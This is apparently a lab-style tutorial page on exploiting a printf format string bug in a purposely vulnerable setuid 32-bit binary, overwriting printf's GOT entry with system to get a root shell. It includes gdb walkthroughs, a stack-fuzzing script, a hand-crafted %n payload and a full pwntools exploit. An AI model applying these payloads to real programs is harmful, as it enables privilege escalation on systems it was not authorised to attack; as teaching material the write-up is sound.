description
09/19/2023

✏️ Overwriting Global Offset Table (GOT)

We're really deep now. Here, we will be focusing on overwriting the Global Offset Table (GOT)! We are going to be using another format string vulnerability, but there will be no buffer overflow this time.

Introduction

The Global Offset Table (GOT) is a section of a computer program's memory that is used to enable computer program code that has been compiled as an ELF file to be ran correctly. Simply put, it is a section inside of the program (ELF) that holds addresses of functions that are dynamically linked.

This is all independent of the memory address where the program's code or data is loaded at during runtime.

The GOT is responsible for mapping symbols (human-readable identifiers when compiled) to their correct addresses to facilitate Position Independent Code (PIC) and Position Independent Executables (PIE).

So, where is the GOT located in memory?

You can find the GOT being represented as the .got and .got.plt sections within the ELF file which are loaded into the program's memory at the start of execution.

The Operating System's dynamic linker updates the GOT's relocations at program startup or when symbols are being accessed.

Dynamic Resolving

This allows the function to be able to be located from a dynamic library with much more efficacy. The result is saved into the GOT so future function calls jump straight to their implementation bypassing the dynamic resolver.

Implications:

The GOT contains pointers to libraries which are constantly moved around due to Address Space Layout Randomization (ASLR)
The GOT is also writeable

What is the Procedure Linkage Table (PLT)?

Before a function's address has been resolved, the GOT will point to an entry in the PLT. This is a function on its own that is responsible for calling the dynamic linker with the name of the function that is to be resolved.

Something else to note:

If the binary that we are targeting is compiled with FULL RELRO, we will NOT be able to use this specific technique on the target. However, if it is compiled with PARTIAL RELRO, we will be able to!

What is RELRO?

Relocation Read-Only (RELRO) is a protection to stop any GOT overwrites from taking place.

Partial RELRO:

This will only move the GOT above the program's variables. However, this does not prevent format string overwrites.

Full RELRO:

This makes the GOT completely read-only, even format string vulnerabilities will not be able to overwrite anything. This is not default in binaries because of slow processing times since it will need to resolve all function addresses simultaneously.

Set Proper File Permissions

sudo chown root:root got_overwrite
sudo chmod 4655 got_overwrite
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

Enumeration

file:

{% code overflow="wrap" %}

file got_overwrite
got_overwrite: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=57da01c938d00b9c9beb3a58299d8c64766d748c, for GNU/Linux 3.2.0, not stripped

{% endcode %}

32-bit Binary
Dynamically linked to libc
Not stripped

checksec:

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   71 Symbols        No    0               2            got_overwrite

Partial RELRO
- This is pertaining to the vulnerability that we will be targeting
- Maps the .got section as read-only (but not .got.plt)
Stack Canary is ENABLED -- Each buffer in the program will contain a stack canary value and the return address
- Before the jump to the return address, the canary value is checked to ensure that it is the same original value, helping to mitigate against buffer overflow attacks
- If the value is not the same, a stack smashing error will be issued; crashing the program
NX is ENABLED -- So we do not have an executable stack

Messing with the Program

We can see that our input is being directly reflected back at us presumably with printf() or something similar.

There must be a while(true) loop going on because the program will infinitely await user-input and not exit.

Unable to segfault from overflow

There seems to be some kind of buffer/sizeof() checking going on since we cannot overflow the buffer.

Reversing

Keep in mind that I renamed variables, added comments, etc.

main():

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */

undefined4 main(void)

{
  int iVar1;
  undefined4 uVar2;
  int in_GS_OFFSET;
  
  iVar1 = *(int *)(in_GS_OFFSET + 20);
  setuid(0);
  setgid(0);
                    /* Vulnerable Functions -- Format String Bug */
  vuln();
  uVar2 = 0;
  if (iVar1 != *(int *)(in_GS_OFFSET + 0x14)) {
                    /* Stack Canary -- __stakc_chk_fail_local indicates usage of canaries */
    uVar2 = __stack_chk_fail_local();
  }
  return uVar2;
}

setuid(0) and setgid(0) are ensuring that our binary runs smoothly with root permissions
We call vuln() and upon further analysis (which you will see below, we were able to identify a format string vulnerability)
__stack_chk_fail_local() indicates usage of stack canary-protected binary

vuln():

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

void vuln(void)

{
  int in_GS_OFFSET;
  char buffer [300];
  undefined4 local_10;
  
  local_10 = *(undefined4 *)(in_GS_OFFSET + 0x14);
  do {
                    /* fgets() is checking that the buffer is sizeof() the specified buffer.
                       Preventing buffer overflow. Also keep in mind canaries are enabled. */
    fgets(buffer,300,_stdin);
                    /* No format string was specified -- printf() format string bug identified */
    printf(buffer);
  } while( true );
}

Instantiate a char-based buffer with size of 300-bytes
fgets() is using sizeof() our buffer (300-bytes) and ensuring up to 300-bytes are being stored and nothing more
printf(buffer) is a string format vulnerability because it is not specifying a format specifier as an argument
while( true ) allows the program to be infinitely looped

Plan of Attack

Notice how we have a string format bug (Remember, this is because our printf() does not utilize a format specifier.) we can input a value that will overwrite an element of the GOT, we can find the address of printf() in the GOT and overwrite it with the address of system().

Since we are constrained to an infinite loop, what will happen is:

We will loop around again
Take an input from us
Then, instead of calling printf() with the buffer, it will call system() with the buffer
If our buffer is "/bin/sh", this will call "/bin/sh"

Understanding GOT vs Procedure Linkage Table (PLT), `GOT.PLT` and `PLT.GOT`

.got:

This is the Global Offset Table (GOT). This is where the actual table of offsets are located as filled in by the linker for external symbols.

.plt:

This is the Procedure Linkage Table (PLT). These are stubs that look up the addresses in the .got.plt section and either jump to the right address or trigger the code in the linker to look up the address.

.got.plt:

This is the GOT for the PLT. It contains the target addresses after they have been looked up or an address back in the .plt to trigger the lookup.

.plt.got:

This contains code to jump to the first entry of the .got.

The PLT and the GOT work together to perform linking.

For example, when you call printf() in C and compile it as an ELF binary, it is not only printf(). Rather, it is compiled as printf@plt. Which you can see in GDB:

The GOT is a massive table of addresses and these are the actual locations in memory of the libc functions.

When the PLT gets called it will read the GOT address and redirect execution from there.

When the address is empty, it will coordinate with the ld.so (A.K.A. the dynamic linker/loader shared object) to get the function address and store it in the GOT.

Key Takeaways

Calling the PLT address of a function is the same as simply calling the function itself.

The GOT address contains addresses of functions in libc and the GOT is within the binary.

Viewing the PLT in Action

After viewing the disassembly for a particular function, I was able to locate fgets(), set a breakpoint, and view the inside of the PLT inside of gdb. After stepping into it, we can see a jump instruction which is acting as a function pointer. This works as a dereference and will jump to the resulting address.

Remember, if ASLR is enabled on your machine, you will get different addresses each time you run the binary.

info functions
0x08049040 fgets@plt

b *0x08049040

r

We can see that since we set a breakpoint at our fgets@plt function, that is where our instruction pointer or EIP value will be left at until we continue execution.

We can use the following command to explicitly view the instruction that places us in the PLT:

x/i $pc
or
x/i $eip

=> 0x8049040 <fgets@plt>:       jmp    DWORD PTR ds:0x804c010

We then see a jmp instruction to a specific address.

However, this is not an ordinary jmp instruction, this is what it looks like when a function pointer is being used.

NOTE: This pointer is in the .got.plt section of the binary.

We can then view the dereference:

x/wx 0x804c010

0x804c010 <fgets@got.plt>:      0x08049046

follow the jmp:

x/2i $pc
=> 0x8049046 <fgets@plt+6>:     push   0x8
   0x804904b <fgets@plt+11>:    jmp    0x8049020

We can see that we immediately jumped to the next instruction. This is because we have not called puts() before and we need to trigger the lookup first.

It will push the number 0x8 onto the stack and then call the routine to lookup the symbol name.

This all happens in the beginning of the .plt section.

Let's find out what this stub does:

x/2i $pc
=> 0x8049020:   push   DWORD PTR ds:0x804c004
   0x8049026:   jmp    DWORD PTR ds:0x804c008

We push the value of the second entry into .got.plt and then jump to the address stored in the third entry.

x/2x 0x804c004
0x804c004:      0xf7f4aa40      0xf7f25fe0

We can obtain our PID from our currently debugged binary running info inferiors inside of pwndbg.

info inferiors 
  Num  Description       Connection           Executable
* 1    process 12579     1 (native)

PID is 12579

We can then read from /proc/pid/maps for more information.

 cat /proc/12579/maps

We can then see that the first entry points into the data segment of ld.so and the 2nd into the executable region.

In other words, we are asking for information for the puts() symbol. These two addresses in the .got.plt section are populated by the linker/loader (ls.so) at the time it is loading the binary.

If we step through the instructions a few times using ni, we will ultimately get to fgets().

info symbol $pc
fgets in section .text of /lib/i386-linux-gnu/libc.so.6

Let's print out our stack:

x/4wx $esp

We can actually get from main to fgets() very quickly just by using the disassembly of puts@plt.

disass 'fgets@plt'
Dump of assembler code for function fgets@plt:
   0x08049040 <+0>:     jmp    DWORD PTR ds:0x804c010
   0x08049046 <+6>:     push   0x8
   0x0804904b <+11>:    jmp    0x8049020
End of assembler dump.

x/wx 0x804c010
0x804c010 <fgets@got.plt>:      0xf7d3d690

info symbol 0xf7d3d690
fgets in section .text of /lib/i386-linux-gnu/libc.so.6

We can see a call to fgets@plt will result immediately in a jmp to the fgets() address loaded via dynamic linking from libc.

So, how did the .got.plt get updated? This is why the pointer in the beginning of the GOT was passed as an argument back to ld.so and ld.so did black magic and inserted the proper address into GOT to replace the previous address which was pointed to the next instruction in the PLT.

Okay great, but how can we exploit this?

Since our ultimate goal is to take control of the flow of execution of the program, we need to remember that the .got.plt section is a giant array of function pointers.

So, could we overwrite one of these and control execution from there?

Any memory corruption primitive that will let you write to an arbitrary address will allow you to overwrite a GOT entry.

Ultimately, .got.plt is very attractive for format string bugs and other arbitrary write exploits.

When your target binary lacks PIE, this will cause the .got.plt to be loaded at a fixed address.

Enabling FULL RELRO will protect against these kinds of attack by preventing writing to the GOT, but will severely impact performance.

Exploitation

Printing values off of the stack with the format string bug:

%p %p %p
0x12c 0xf7f80620 0x80491b1
%s
Segmentation fault

Why did this happen?

We are able to print pointers from the stack by using %p as the format specifier.

However, when we try to print a whatever address 0x12c is pointing to as a string using %s, it is going to result in a segmentation fault because the address 0x12c is pointing to is NOT a valid location in memory (not in scope).

Fuzzing `printf()` Format Vulnerability

Read more about Format String Vulnerabilities here:

{% embed url="https://axcheron.github.io/exploit-101-format-strings/" %}

fuzz.py:

from pwn import *

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./got_overwrite', checksec=False)

# Create process (level used to reduce noise)
p = process(level='error')

# Let's fuzz x values
for i in range(100):
    try:
        # Format the counter
        # e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int
        p.sendline('%{}$x'.format(i).encode())
        # Receive the response
        result = p.recvline().decode()
        # If the item from the stack isn't empty, print it
        if result:
            print(str(i) + ': ' + str(result).strip())
    except EOFError:
        pass

This script will iterate 100 times and fuzz $x, so printing out values on the stack in hex format.

We want to focus on the %n format specifier.

When performing this kind of technique, we want to fuzz and print out values on the stack when injecting arbitrary data to see where our data/input ends up.

Manual Approach (just messing with the program)

We can incrementally utilize position-based parameters with our input and print out or inject in a specific part of the stack.

See an example below:

Pay attention to the decrementing value immediately after the %. We start with %6 and go to %4 in order to identify where our input ends up on the stack.

./got_overwrite

AAAA%6$p
AAAA0xf7fb000a
AAAA%5$p
AAAA0x70243525
AAAA%4$p
AAAA0x41414141

Okay cool, what is 41414141 converted to ASCII?

We can use the pwntools tool, unhex 41414141 to figure this out.

AAAA!

Great, we have identified where our data is being injected onto the stack.

So we need to answer what place the input gets placed into so we can identify the address that can then be used for the %n write operation.

Manual Exploitation Methodology -- `printf()` write exploit w/ `%n`

We can use the following methodology to help us craft an exploit manually:

{% code overflow="wrap" %}

# Need to overwrite 0x0804c00c (GOT.printf) with 0xf7dff040 (LIBC.system)

# It means writing 0xf7df (63455) @ 0x0804c00c + 2 = 0x0804c00e (high order)
# and 0xf040 (61504) @ 0x0804c00c (low order)

# Now, we have to figure out the value to set for the padding. Here is the formula :
[The value we want] - [The bytes alredy wrote] = [The value to set].

# Let’s start with the low order bytes :
It’ll will be 61504 - 8 = 61496, because we already wrote 8 bytes (the two 4 bytes addresses).

# Then, the high order bytes :
It’ll will be 63455 - 61504 = 1951, because we already wrote 61504 bytes (the two 4 bytes addresses and 61496 bytes from the previous writing).

# Now we can construct the exploit (note our write offset is %4 so we want [%4,%5] as offsets instead of [%7,%8]) :

It’ll be : \x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn. Let me explain :
    \x0c\xc0\x04\x08 or 0x0804c00c (in reverse order) points to the low order bytes.
    \x0e\xc0\x04\x08 or 0x0804c00e (in reverse order) points to the high order bytes.
    %61496x will write 61496 bytes on the standard output.
    %4$hn will write 8 + 61496 = 61504 bytes (or 0xf040) at the first address specified (0x0804c00c).
    %1951x will write 1951 bytes on the standard output.
    %5$hn will write 8 + 61496 + 1951 = 63455 (or 0xf7df) at the second address specified (0x0804c00e).

python2 -c 'print("\x0c\xc0\x04\x08\x0e\xc0\x04\x08%61496x%4$hn%1951x%5$hn")' > payload

* Based on excellent blogpost: https://axcheron.github.io/exploit-101-format-strings/

{% endcode %}

Obtaining GOT.printf address:

Load the binary in Ghidra, open up the Program Tree, and inside of the got.plt, you will see an EXTERNAL reference to printf(), use that address, and you will have your GOT.printf address.

Program Trees

Listing View // Obtaining GOT.printf address

Obtain libc base address:

ldd got_overwrite
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7d7f000)

Automated Exploit

exploit.py:

from pwn import *
from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Function to be called by FmtStr
def send_payload(payload):
    io.sendline(payload)
    return io.recvline()


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())


# Set up pwntools for the correct architecture
exe = './got_overwrite'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Found manually (ASLR_OFF)
libc = elf.libc
libc.address = 0xf7d7f000 #0xf7e02150 #0xf7dba000  # ldd got_overwrite

# Find the offset for format string write
format_string = FmtStr(execute_fmt=send_payload)
info("format string offset: %d", format_string.offset)

# Print address to overwrite (printf) and what we want to write (system)
info("address to overwrite (elf.got.printf): %#x", elf.got.printf)
info("address to write (libc.functions.system): %#x", libc.symbols.system)

# Overwrite printf() in GOT with Lib-C system()
# Manual, like in notes.txt
# format_string.write(0x0804c00c, p16(0xf040))  # Lower-order
# format_string.write(0x0804c00e, p16(0xf7df))  # Higher-order
# Or automagically
format_string.write(elf.got.printf, libc.symbols.system)

# Execute the format string writes
format_string.execute_writes()

# Get our flag!
io.sendline(b'/bin/sh')
io.interactive()

Successful Exploitation

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

overwriting-global-offset-table-got.md

overwriting-global-offset-table-got.md

✏️ Overwriting Global Offset Table (GOT)

Introduction

GitHub

Video Reference

Other References

Set Proper File Permissions

Enumeration

Messing with the Program

Reversing

Plan of Attack

Understanding GOT vs Procedure Linkage Table (PLT), `GOT.PLT` and `PLT.GOT`

Key Takeaways

Viewing the PLT in Action

Okay great, but how can we exploit this?

Exploitation

Fuzzing `printf()` Format Vulnerability

Manual Approach (just messing with the program)

Manual Exploitation Methodology -- `printf()` write exploit w/ `%n`

Automated Exploit

Files

overwriting-global-offset-table-got.md

Latest commit

History

overwriting-global-offset-table-got.md

File metadata and controls

✏️ Overwriting Global Offset Table (GOT)

Introduction

GitHub

Video Reference

Other References

Set Proper File Permissions

Enumeration

Messing with the Program

Reversing

Plan of Attack

Understanding GOT vs Procedure Linkage Table (PLT), GOT.PLT and PLT.GOT

Key Takeaways

Viewing the PLT in Action

Okay great, but how can we exploit this?

Exploitation

Fuzzing printf() Format Vulnerability

Manual Approach (just messing with the program)

Manual Exploitation Methodology -- printf() write exploit w/ %n

Automated Exploit

Understanding GOT vs Procedure Linkage Table (PLT), `GOT.PLT` and `PLT.GOT`

Fuzzing `printf()` Format Vulnerability

Manual Exploitation Methodology -- `printf()` write exploit w/ `%n`